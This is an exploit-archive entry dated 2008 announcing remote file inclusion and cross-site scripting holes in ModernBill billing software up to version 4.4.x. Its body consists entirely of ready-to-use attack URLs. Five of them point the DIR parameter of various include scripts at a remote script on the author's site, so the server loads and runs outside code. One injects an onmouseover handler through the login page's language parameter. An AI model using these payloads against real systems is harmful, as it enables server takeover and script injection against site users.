[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ModernBill <= 4.4.x XSS / Remote File Inclusion Vulnerability
# Published : 2008-10-31
# Author : nigh7f411
# Previous Title : SFS EZ Software (id) Remote SQL Injection Vulnerability
# Next Title : Article Publisher PRO (userid) Remote SQL Injection Exploit
**************************************************************************************
ModernBill .:. Client Billing System - User Login
ModernBill <= v4.4.X Remote File Inclusion Vulnerability and xss by nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
**************************************************************************************
rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?
xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+
**************************************************************************************
# www.Syue.com [2008-10-31]